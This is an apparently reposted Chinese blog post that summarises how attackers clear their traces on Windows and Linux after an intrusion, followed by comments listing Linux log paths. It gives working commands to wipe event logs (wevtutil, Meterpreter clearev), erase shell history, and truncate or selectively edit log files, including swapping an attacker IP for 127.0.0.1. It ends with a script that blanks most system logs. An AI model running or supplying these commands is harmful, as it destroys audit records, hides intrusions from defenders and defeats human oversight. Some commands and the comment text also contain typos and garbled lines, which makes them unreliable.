後滲透階段清理痕跡方式總結[刪除LOG檔案/各種LOG檔案功能介紹]

後滲透階段清理痕跡方式總結[刪除LOG檔案/各種LOG檔案功能介紹]

後滲透階段清理痕跡方式總結[刪除LOG檔案/各種LOG檔案功能 介紹/簡介]


資料來源: https://mp.weixin.qq.com/s/SWMWVezAVzykkjTuRRDxJw


一、前言

    在滲透完成之後,為了減少被發現和追溯的概率,攻擊者有必要清除自己的攻擊痕跡,本文分別對windows和linux上清理痕跡的方式做一個總結。


二、windows

有遠端桌面許可權時手動刪除日誌:

開始-程式-管理工具-電腦管理-系統工具-事件檢視器-清除日誌

wevtutil:

wevtutil cl security    清理安全性記錄檔

meterperter 自帶清除日誌功能:

clearev     清除windows中的應用程式日誌、系統日誌、安全性記錄檔

wevtutil:

wevtutil el             列出系統中所有日誌名稱
wevtutil cl system      清理系統日誌
wevtutil cl application 清理應用程式日誌
wevtutil cl security    清理安全性記錄檔

清除recent:

在文件資源管理器中點擊“查看”->“選項”->在常規->隱私中點擊”清除”按鈕
或直接打開C:\Users\Administrator\Recent並刪除所有內容
或在命令列中輸入del /f /s /q “%userprofile%\Recent*.*


三、linux


清除命令歷史記錄

histroy -r          #刪除當前會話歷史記錄
history -c          #刪除記憶體中的所有命令歷史
rm .bash_history    #刪除歷史檔中的內容
HISTZISE=0          #通過設置歷史命令條數來清除所有歷史記錄

在隱蔽的位置執行命令(使用vim打開檔執行命令)

:set history=0
:!command

linux日誌檔

/var/log/secure 記錄安全相關的日誌資訊 

/var/log/boot.log 記錄守護進程啟動和停止相關的日誌消息

完全刪除日誌檔:

cat /dev/null > filename
: > filename
> filename
echo "" > filename
echo > filename

linux日誌檔

/var/run/utmp 記錄現在登入的使用者
/var/log/wtmp 記錄使用者所有的登入和登出
/var/log/lastlog 記錄每一個使用者最後登入時間
/var/log/btmp 記錄錯誤的登入嘗試
/var/log/auth.log 需要身份確認的操作
/var/log/secure 記錄安全相關的日誌資訊
/var/log/maillog 記錄郵件相關的日誌資訊
/var/log/message 記錄系統啟動後的資訊和錯誤日誌
/var/log/cron 記錄定時任務相關的日誌資訊
/var/log/spooler 記錄UUCP和news設備相關的日誌資訊
/var/log/boot.log 記錄守護進程啟動和停止相關的日誌消息

針對性刪除日誌檔:

刪除當天日誌

sed  -i '/當天日期/'d  filename

篡改日誌檔:(將所有170.170.64.17ip 替換為127.0.0.1)

sed -i 's/170.170.64.17/127.0.0.1/g'

一鍵清除腳本:

#!/usr/bin/bash
echo > /var/log/syslog
echo > /var/log/messages
echo > /var/log/httpd/access_log
echo > /var/log/httpd/error_log
echo > /var/log/xferlog
echo > /var/log/secure
echo > /var/log/auth.log
echo > /var/log/user.log
echo > /var/log/wtmp
echo > /var/log/lastlog
echo > /var/log/btmp
echo > /var/run/utmp
rm ~/./bash_history
history -c

2 thoughts on “後滲透階段清理痕跡方式總結[刪除LOG檔案/各種LOG檔案功能介紹]

  1. 黑客 / 駭客
    抹去 / 清除 / 清理 / 擦去 / 刪除 / 隱藏 / 偽裝
    入侵 / 駭入 / 破解
    紀錄 / 線索 / 資訊 / 資料 / 痕跡 / LOG 檔案
    SERVER / 主機/ 服務器
    入門 教學 介紹 簡介

  2. linux 系統各種日誌存儲路徑和詳細介紹 (LOG 檔案 目錄路徑 位置)

    https://blog.csdn.net/konglongaa/article/details/54289852

    1、/var/log/boot.log(自檢過程)

    2、/var/log/cron(crontab守護進程crond所派生子進程的動作)

    3、/var/log/maillog(發送到系統或從系統出的電子郵件的活動)

    4、/var/log/sysl(它只記警告信息,常常是系統出問題的信息,所以更應該關注該文件)
    要讓系統生成syslog日誌文件,在/etc/syslog.co件中加上:*waringvgsy該日誌文件能記錄當用戶登錄時login記錄下的錯誤口令、Sedma問題令失息

    5、/var/run/utmp
    該日誌文件需要使用lastlog命令查看

    6、/var/log/wtmp
    (該日誌文件永久記錄每個用戶登錄、註銷系統的啟動停事件)

發表迴響

你的電子郵件位址並不會被公開。 必要欄位標記為 *